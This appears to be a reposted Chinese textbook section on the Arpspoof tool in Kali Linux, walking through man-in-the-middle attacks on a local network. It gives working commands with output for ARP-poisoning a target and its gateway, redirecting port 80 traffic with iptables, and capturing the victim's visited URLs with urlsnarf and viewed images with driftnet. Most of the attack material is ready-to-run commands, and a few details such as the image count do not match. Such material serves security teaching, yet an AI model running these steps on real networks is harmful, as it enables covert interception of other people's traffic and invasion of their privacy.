Kali-linux Arpspoof工具


Kali-linux Arpspoof工具

Arpspoof是一個非常好的ARP欺騙的源代碼程序。它的運行不會影響整個網絡的通信,該工具通過替換傳輸中的數據從而達到對目標的欺騙。本節將介紹Arpspoof工具的 使用。

9.8.1 URL流量操縱攻擊

URL流量操作非常類似於中間人攻擊,通過目標主機將路由流量注入到因特網。該過程將通過ARP注入實現攻擊。本小節將介紹使用Arpspoof工具實現URL流量操縱攻擊。使用Arpspoof工具實現URL流量操作攻擊。具體操作步驟如下所示:

(1)開啟路由轉發功能。執行命令如下所示:

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward 

執行以上命令后,沒有任何信息輸出。

(2)啟動Arpspoof注入攻擊目標系統。攻擊的方法是攻擊者(192.168.6.102)發送ARP數據包,以欺騙網關(192.168.6.1)和目標系統(192.168.6.101)。下面首先欺騙目標系統,執行命令如下所示:

root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d 

輸出的信息顯示了攻擊者向目標主機192.168.6.102發送的數據包。其中50:e5:49:eb:46:8d表示攻擊者的MAC地址;19:21:3f:c3:e5表示192.168.6.101的MAC地址。當以上過程攻擊成功后,目標主機192.168.6.101給網關192.168.6.1發送數據時,都將發送到攻擊者192.168.6.102上。

(3)使用Arpspoof注入攻擊網關。執行命令如下所示:

root@kali:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d 

以上輸出信息顯示了攻擊者向網關192.168.6.1發送的數據包。當該攻擊成功后,網關192.168.6.1發給目標系統192.168.6.101上的信息發送到攻擊者主機192.168.6.102上。

(4)以上步驟都執行成功后,攻擊者就相當於控制了網關與目標主機傳輸的數據。攻擊者可以通過收到的數據,查看到目標系統上重要的信息。

為了驗證以上的信息,下面舉一個簡單的例子。

【實例9-7】通過使用Wireshark抓包驗證Arpspoof工具的攻擊。具體操作步驟如下所示。

(1)啟動Wireshark工具。在Kali Linux桌面依次選擇“應用程序”|Kali Linux|Top 10 Security Tools|wireshark命令,將顯示如圖9.49所示的界面。

圖9.49 Wireshark啟動界面

(2)在該界面Start下面,選擇要捕獲的接口。這里選擇eth0,然后單擊Start按鈕,將顯示如圖9.50所示的界面。

圖9.50 抓包界面

(3)該界面可以對Wireshark進行相關設置及啟動、停止和刷新數據包。

(4)在目標系統192.168.6.101上ping網關192.168.6.1。執行命令如下所示:

C:\Users\Administrator>ping 192.168.6.1 

以上命令執行完后,到Kali下查看Wireshark抓取的數據包,如圖9.51所示。

圖9.51 捕獲的數據包

(5)該界面顯示了192.168.6.101與192.168.6.1之間數據傳輸的過程。其中傳輸整個過程的編號為28-33,28-30是一個請求數據包過程,31-33是目標響應數據包過程。下面詳細分析捕獲的數據包。

  • 28:表示192.168.6.101(源)向192.168.6.1(目標)發送ping請求。
  • 29:表示192.168.6.102將192.168.6.101的數據包進行轉發。
  • 30:表示192.168.6.102將轉發后的數據包,再向192.168.6.1發送請求。
  • 31:表示目標主機192.168.6.1響應192.168.6.101的請求。
  • 32:表示該響應被發送到192.168.6.102上,此時該主機轉發到192.168.6.1。
  • 33:目標主機192.168.6.1將轉發的數據發送給192.168.6.101上。

9.8.2 端口重定向攻擊

端口重定向又叫端口轉發或端口映射。端口重定向接收到一個端口數據包的過程(如80端口),並且重定向它的流量到不同的端口(如8080)。實現這類型攻擊的好處就是可以無止境的,因為可以隨着它重定向安全的端口到未加密端口,重定向流量到指定設備的一個特定端口上。本小節將介紹使用Arpspoof實現端口重定向攻擊。使用Arpspoof實現端口重定向攻擊。具體操作步驟如下所示。

(1)開啟路由轉發攻擊。執行命令如下所示:

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward 

(2)啟動Arpspoof工具注入流量到默認網絡。例如,本例中的默認網關地址為192.168.6.1。執行命令如下所示:

root@kali:~# arpspoof -i eth0 192.168.6.1 

在Kali Linux上執行以上命令后,沒有任何輸出信息。這是Kali 1.0.6上的一個bug,因為在該系統中dsniff軟件包的版本是dsniff-2.4b1+debian-22。執行arpspoof命令不指定目標系統時,只有在dsniff軟件包為dsniff-2.4b1+debian-21.1上才可正常運行。

(3)添加一條端口重定向的防火牆規則。執行命令如下所示:

root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 

執行以上命令后,沒有任何輸出。

以上設置成功后,當用戶向網關192.168.6.1的80端口發送請求時,將會被轉發為8080端口發送到攻擊者主機上。

9.8.3 捕獲並監視無線網絡數據

使用中間人攻擊的方法,可以使Kali Linux操作系統處在目標主機和路由器之間。這樣,用戶就可以捕獲來自目標主機的所有數據。本小節將介紹通過使用Arpspoof工具實施中間人攻擊,進而捕獲並監視無線網絡數據。

(1)開啟路由器轉發功能。執行命令如下所示:

root@Kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward 

(2)使用Arpspoof命令攻擊主機。執行命令如下所示:

root@kali:~# arpspoof -i eth0 -t 192.168.6.106 192.168.6.1 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 0:c:29:7a:59:75 0:c:29:fc:a9:25 0806 42: arp reply 192.168.6.1 is-at 0:c:29:7a:59:75 ...... 

執行以上命令表示告訴192.168.6.106(目標主機),網關的MAC地址是00:0c:29:7a:59:75(攻擊主機)。當目標主機收到該消息時,將會修改ARP緩存表中對應的網關ARP條目。執行以上命令后,不會自動停止。如果不需要攻擊時,按下Ctrl+C組合鍵停止攻擊。

(3)查看目標主機訪問URL地址的信息。執行命令如下所示:

root@kali:~# urlsnarf -i eth0 urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128] 192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168\. 6.1:1900/igd.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168\. 6.1:1900/l3f.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:30 +0800] "GET http://192.168\. 6.1:1900/ifc.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:33 +0800] "GET http://192.168\. 6.1:1900/ipc.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "GET http://192.168\. 6.1:1900/igd.xml HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168\. 6.1:1900/ipc HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168\. 6.1:1900/ifc HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168\. 6.1:1900/ipc HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 192.168.6.106 - - [16/Jul/2014:13:12:37 +0800] "POST http://192.168\. 6.1:1900/ifc HTTP/1.1" - - "-" "Microsoft-Windows/6.1 UPnP/1.0" 

以上輸出的信息顯示了目標主機訪問互聯網的信息。

(4)用戶還可以使用Driftnet工具,捕獲目標系統瀏覽過的圖片。執行命令如下所示:

root@kali:~# driftnet -i eth0 

執行以上命令后,將會打開一個窗口。當目標主機訪問到網頁中有圖片時,將會在該窗口中顯示。

(5)現在到目標主機上,訪問互聯網以產生捕獲信息。例如,隨便在目標主機上通過瀏覽器訪問某個網頁,攻擊主機將顯示如圖9.52所示的界面。

圖9.52 目標主機訪問的圖片

(6)該界面顯示了目標主機上訪問的所有圖片。現在用戶可以通過點擊圖9.52中的任何一張圖片,該圖片將被保存到Kali主機上。此時driftnet命令下,將會出現如下所示的信息:

root@kali:~# driftnet -i eth0 driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png' as `driftnet-0.png' driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d45c168e121f.png' as `driftnet-1.png' driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4ca5d888a08.jpeg' as `driftnet-2.jpeg' driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png' as `driftnet-3.png' driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d4d92a6de806.png' as `driftnet-4.png' driftnet: saving `/tmp/drifnet-YbOziq/driftnet-53c9d5351a9a9e69.png' as `driftnet-5.png' 

從上面可以看到,保存了driftnet捕獲到的7張圖片。其文件名分別為driftnet-*.png,並且這些文件默認保存當前目錄下。

(7)用戶可以使用Linux自帶的圖像查看器查看,如圖9.53所示。

圖9.53 捕獲的圖片

(8)該界面顯示的是第四張圖片。用戶可以通過單擊“下一張”或“上一張”按鈕,切換捕獲到的圖片。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM